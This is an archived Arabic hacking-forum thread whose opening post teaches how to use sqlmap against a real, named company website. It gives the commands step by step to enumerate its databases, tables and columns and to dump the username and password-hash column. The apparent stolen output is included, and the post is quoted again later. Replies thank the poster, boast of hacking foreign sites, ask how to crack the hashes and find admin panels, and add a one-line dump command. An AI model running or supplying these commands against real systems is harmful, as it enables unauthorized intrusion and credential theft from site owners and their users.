المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك



r00t-minat0r
08-15-2011, 05:52 AM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql

http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

النتيجة

available databases [2]:

information_schema

www-bcspeakerstest

مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

والنتيجة كالتالي

+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

النتيجة

+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+

كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي

+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته

halk green
08-15-2011, 06:44 AM
والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية

r00t-minat0r
08-15-2011, 07:07 AM
والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية
بارك الله فيك ومشكور على مرورك العطر

Omar Hack
08-15-2011, 07:40 AM
بارك الله فيك أخوي العزيز
وزادك الله من علمه

halk green
08-15-2011, 09:26 AM
والله مشكور عنجد مجهود رائع

Ace
08-15-2011, 02:12 PM
الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر

djxxjd
08-15-2011, 02:41 PM
niccccccccce

djxxjd
08-15-2011, 03:51 PM
gooooooooooooood

r00t-minat0r
08-15-2011, 08:47 PM
بارك الله فيك أخوي العزيز
وزادك الله من علمه
مشكور اخي عمر على مرورك اتمنى ان يكون الشرح ذا فائدة للجميع


الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر
ان شاء الله اخي العزيز مشكور على مرورك منور الموضوع
سوف نضع المزيد من المواضييع في هذا القسم الرائع بأذن الله خلاص انتهى زمان البيفروست وغيره


niccccccccce
مشكور على مرورك اخي الكريم

Mad Devil
08-15-2011, 09:01 PM
مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني

Ace
08-15-2011, 09:24 PM
مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني

عيوووووووووووووني اخي

Hidden pain
08-16-2011, 02:43 AM
شرح روعة أخي
بارك الله فيك
استمر مع حصرياتك

r00t-minat0r
08-16-2011, 03:52 AM
شرح روعة أخي
بارك الله فيك
استمر مع حصرياتك
مشكور اخي وانا يشرفني مرورك على الموضوع

morgos
08-26-2011, 04:56 AM
شكرا لتعليمي ولكن كيف فك تشفير كلمة المرور (md5) الرجاء

حيوش
09-04-2011, 01:44 AM
نعم كيف يتم فك التشفيررررررررر انا اخترقت كثير مواقع اجنبية ولاكن المشكلة في فك التشفيررررررررر الي يعرف يقول ؟؟؟؟؟؟؟؟

ومشكورررررررررر على الشرح المبدع

مهكر القلوب
10-07-2011, 10:29 PM
مشكووووووووور بارك الله فيك

hassan.dk
10-19-2011, 02:59 PM
مبدع مشاء الله الله يجعلنا من المستفيدين منك و مشكور اخي على المجهود :cool:

hmezkcq
10-22-2011, 01:49 AM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql

http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

النتيجة

available databases [2]:

information_schema

www-bcspeakerstest

مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

والنتيجة كالتالي

+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

النتيجة

+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+

كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي

+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته



لو كان شرحا عبر فيديو لكان روعة أخي فيديو من فضلك

قاتل الهكر
01-30-2012, 03:47 PM
مشكور على الموضوع اخوي

EgYpT.HaCkEr
01-30-2012, 08:00 PM
رافو احلى تقيم

السفاح M
01-31-2012, 06:19 PM
مشكور على المعلوات القيمة

bade boo
01-31-2012, 08:14 PM
مشكوووووووووووووووور

Ghost-007
02-16-2012, 05:06 PM
مشكوررررررررررررررررررررر ررررررررررررررر

Ghost-007
02-16-2012, 05:07 PM
مشكوووووووووووووووور

Ghost-007
02-16-2012, 05:07 PM
مشكور على المعلوات القيمة

Ghost-007
02-16-2012, 05:09 PM
مشكوووووووووو

Ghost-007
02-16-2012, 05:10 PM
مشكووووووووو

Ghost-007
02-16-2012, 05:27 PM
مشكوررررررررررررررررررر

Ghost-007
02-16-2012, 05:28 PM
مشكورررررررررررررررررر

Ghost-007
02-16-2012, 05:28 PM
مشكوررررررررررررررررر

Ghost-007
02-16-2012, 05:29 PM
مشكورررررررررررررررر

Ghost-007
02-16-2012, 05:30 PM
مشكوررررررررررررر

Ghost-007
02-16-2012, 05:31 PM
مشكورررررررررر

Ghost-007
02-16-2012, 05:32 PM
مشكوررررررر

Ghost-007
02-16-2012, 05:34 PM
مشكوررررةةةةةةةةةةةةةةةةة ةةةةةةةة

Ghost-007
02-16-2012, 05:35 PM
مشكوررررةةةةةةةةةةةةةةةةة ةةةةةةةة

Ghost-007
02-16-2012, 05:39 PM
مشكوررررةةةةةةةةةةةةةةةةة ةةةة

Ghost-007
02-16-2012, 05:41 PM
مشكوررررةةةةةةةةةةةةةةةةة ةة

Ghost-007
02-16-2012, 05:43 PM
مشكوررررةةةةةةةةةةةةةةةة

Ghost-007
02-16-2012, 05:44 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر

Ghost-007
02-16-2012, 05:47 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررررررر

Ghost-007
02-16-2012, 05:48 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررررر

Ghost-007
02-16-2012, 05:49 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر ررر

Ghost-007
02-16-2012, 05:50 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر

Ghost-007
02-16-2012, 05:50 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررر

Ghost-007
02-16-2012, 06:01 PM
مشكوررررررررررررررررررررر ررررررررررررررررر

Ghost-007
02-16-2012, 06:01 PM
مشكوررررررررررررررررررررر ررررررررررررررررررررررررر رررررررر









مشكوررررررررررررررررررررر رررررررررررررررررررر

Ghost-007
02-16-2012, 06:02 PM
مشكوررررررررررررررررررررر ررررر

IQX
07-15-2012, 10:27 PM
مًًـُُـًــشـًَِـ:ـكـًــًؤ� �ؤِؤْر:) ♡♡♡♡♡

jaroud007
07-17-2012, 05:10 PM
مشكور اخي و جزاك الله الف خيرو الله االله ينورك اخي جميل
تقبل مروري موفق بإذن الله ... لك مني أجمل تحية .

....قَالَ رَسُولُ اللَّهِ صلى الله عليه وسلم ‏
(("‏‏ مَنْ سُئِلَ عَنْ عِلْمٍ فَكَتَمَهُ أَلْجَمَهُ اللَّهُ بِلِجَامٍ مِنْ نَارٍ يَوْمَ الْقِيَامَةِ ‏"‏‏ )).

فَقَاتِلْ فِي سَبِيلِ اللَّهِ لا تُكَلَّفُ إِلا نَفْسَكَ وَحَرِّضِ الْمُؤْمِنِينَ
عَسَى اللَّهُ أَنْ يَكُفَّ بَأْسَ الَّذِينَ كَفَرُوا وَاللَّهُ أَشَدُّ بَأْسًا وَأَشَدُّ تَنْكِيلا

وقوله تعالى :

[ وَلاَ تَحْسَبَنَّ الَّذِينَ قُتِلُواْ فِي سَبِيلِ اللّهِ أَمْوَاتاً بَلْ أَحْيَاء عِندَ رَبِّهِمْ يُرْزَقُونَ{169} فَرِحِينَ بِمَا آتَاهُمُ اللّهُ مِن فَضْلِهِ وَ يَسْتَبْشِرُونَ بِالَّذِينَ لَمْ

يَلْحَقُواْ بِهِم مِّنْ خَلْفِهِمْ أَلاَّ خَوْفٌ عَلَيْهِمْ وَلاَ هُمْ يَحْزَنُونَ{170} يَسْتَبْشِرُونَ بِنِعْمَةٍ مِّنَ اللّهِ وَفَضْلٍ وَأَنَّ اللّهَ لاَ يُضِيعُ أَجْرَ الْمُؤْمِنِينَ{171} ]

سورة آل عمران

( قُلْ إِنَّ صَلَاتِي وَنُسُكِي وَمَحْيَايَ وَمَمَاتِي لِلَّهِ رَبّ الْعَالَمِينَ، لَا شَرِيكَ لَهُ وَبِذَلِكَ أُمِرْتُ وَأَنَا أَوَّلُ الْمُسْلِمِينَ )

صدق الله العضيم
سبحان الله عدد ما كان وعدد ما سيكون وعدد الصمت والسكون
الا ان حزب الله هم الغالبون
لن تركع امة قائدها محمد (ص)

لا تأسف على الزمان لطالما بلت على جتث الاسود كلاب لا قصدها ان تعلوا على اسياديها تبقى الاسود أسود وكلاب كلا تبقى الاسود

مخيفة في اسرها حتى وان نبحت عليها الكلاب

قـُل مآشئـت في مسبتـي فسكُوتي عن آلحقيـرٍ .. جوٍآإب ..
ليس ضعفا مني ولكن مامن اسد يرد على خطب..الكلاب ...
تعلم للمنفعة أو لرد الضرر
مشكور اخي
__________________
قال: الرسول صلى الله عليه وسلم

1- { من ترك صلاة الفجر فليس في وجه نور }
2- { من ترك صلاة الظهر فليس في رزقة بركه }
3- { من ترك صلاةالعصرفليس في جسمه قوة }
4- { من ترك صلاة المغرب فليس في أولادة ثمرهـ}
5- { من ترك صلاة العشاء فليس فينومه رأحه}
مشكور اخي

قال رسول الله صلى الله عليه وآله وسلم : 'الحمد لله الذي تواضع كلُّ شيء لعظمته، الحمد لله الذي استسلم كلُّ شيء لقدرته، الحمد لله الذي ذلَّ كلُّ شيء لعزته، الحمد لله الذي خضع كل شيء لملكه
من قال هذا الدعاء مرة واحدة، تكتب له 1000 حسنة ويرفع به 1000 درجة، ويوكل الله له 70000 ملك يستغفرون له إلى يوم القيامة .
حق على من سمع هذا الدعاء يعلمه لغيره ……والدال على الخير كفاعله
لا تحسبوا رقصي بينكم طربا ***فإن الطير يرقص مدبوحا من شدة الإلم

sarahassan
10-02-2012, 06:38 AM
ابدااااااااااااااااااااع

xXEnigmaXx
10-04-2012, 10:39 AM
بارك الله فيك
شكرا على المعلومات المفيدة

سارة الغامدي
10-04-2012, 11:46 PM
يسلمؤؤؤؤ ..

إُلقنـآصّ
10-20-2012, 06:50 PM
بارك الله فيك اخي شرح ولا اروع .. شكراً وتسلم يابطلٌ ..!

marshall
10-21-2012, 12:12 AM
السلام عليكم و رحمة الله و بركاته
اشكرك على هدا الشرح الوفي لكن كيف افك تشفير باسورد كهدا 76e375e35ccca94a علما اني استعملت مواقع كثيرة لفك التشفير و لم احصل على نتيجة
شكرا

عبد الله العزاني
10-22-2012, 12:04 AM
مشكور اخوي يعطيك الف عافية

مُنتَقِمـ لِفَلـسطـين
10-30-2012, 02:04 AM
مشكور ما قصرت

zias
11-08-2012, 07:46 PM
مشكورررر بارك الله فيك

THABET Dz MEN
01-19-2013, 11:01 AM
مشكوووووووووووووووووووووو وووووووووووور

المايسترو سيزار
01-26-2013, 02:04 PM
مشكور ويعطيك العافيه

عبدالله97
01-30-2013, 07:01 PM
بارك الله فيك يعطيك العافية انشاء الله .......بالتوفيق

محمد 2015
02-16-2013, 07:48 PM
مششكووووووووووووووور اخي

مهدي-هكر
10-12-2013, 07:14 PM
هههههههه وصلت لموقع شوبنج بس ما عرفت مسار لوحة التحكم :wink: << إنهبل
ممكن تساعدوني بالخاص لو سمحتم عن طريقة إيجاد لوحة التحكم

refland
10-16-2013, 05:22 PM
شرح واضح جدا جدا فقط هناك ملاحظة الموضوع لن يكون اكثر متعة الا اذا كنت تتقن الحقن اليدوي للاكواد عن جد هذا كلام اقوله عن علم

- - - تم التحديث - - -


هههههههه وصلت لموقع شوبنج بس ما عرفت مسار لوحة التحكم :wink: << إنهبل
ممكن تساعدوني بالخاص لو سمحتم عن طريقة إيجاد لوحة التحكم
لن اساعدك بشكل مباشر لكن ساوجهك بخصوص ان تجد لوحة التحكم لازم تفكر في سكريبت ما يساعدك على ايجاد لوحة التحكم سواء يعمل على البيرل او سيرفر شخصي من نوع php
كما انبهك لنقطة جد مهمة انه توجد اداة في الباتراك تساعدكعلى تحديد لو حة التحم فيه كثير كثير ادوات
موفق

- - - تم التحديث - - -


لو كان شرحا عبر فيديو لكان روعة أخي فيديو من فضلك
اخي انا احترم وجهت رايك ان يكون هناك فيديو لكن لو سمحت لي عن جد لو انت تتقن اكواد الحقن بشكل جيد وتميز بين الصفحات سكيول كما تحترف تخطي الفلترة وكل شيئ لن تحتاج الى فيديو لان الدرس واضح
كل مافيه يجب ان تعرف انه بعد تطبيق الامر
python sqlmap.py -u URLpage.php?id=22 --dbs

اللي يعمل على اعطائك اسم قاعدة البيانات التي هي بدورها تحتاجها لمعرفة الجداول ثم بعد معرفة الجداول لازم .........
بمعني لو انت بدات من الحقن اليدوي تفهم على طول
كمان فيه نقطة مهمة تتعلق بتحديد ثغرات سكيول اقصد هناك اداو في الباتراك جد رائعة اسمها
WAPITI
ستحتاجها لاستخراج ثغرات السكيول ادرس الاداة فهي مهمة
المهم ساعطيك فيديو
http://www.youtube.com/watch?v=GPPaGi86UDQ

Abdullah Alhomsy
10-17-2013, 01:19 PM
بسم الله الرحمن الرحيم ~.

مشكور على الطريقة ~.

كاسر المشاعر
11-04-2013, 11:11 AM
مشكووووووووووووووووووور

ميستر انونيموس
02-12-2014, 11:09 PM
مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني
مشكوووووووووور

mazen110m
02-22-2014, 01:17 PM
ما شاء الله عليك
تسلم يا غالى

Alantry
02-24-2014, 12:19 AM
مشكوووووووور

- - - تم التحديث - - -

مشكوووووووور..

- - - تم التحديث - - -

مشكوووووووور...........

yassine007
03-20-2014, 09:48 PM
بارك الله فيك مشكور

dz roocker
03-22-2014, 05:35 PM
موضوع مفيد . لكن جرب استخراج user و pass بامر واحد
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C user,password --dump

MT3BHM
04-18-2014, 11:57 AM
بارك الله فيك ي الغالي

MT3BHM
04-24-2014, 09:07 AM
ابداااااااااع

لتواصل معي سلسعيات هكر
او لتبادل الخبرات

bb: 7b5525c5

MT3BHM
04-27-2014, 08:44 AM
ابدااااااع
لتواصل او تبادل الخبرات
bb: 7b5525c5

Hitler07
05-12-2014, 07:18 PM
ولا زالت المشكله الكبرى امام الاسكيول ( الهاش ) عندي هاشات كثير بس كيف تنفك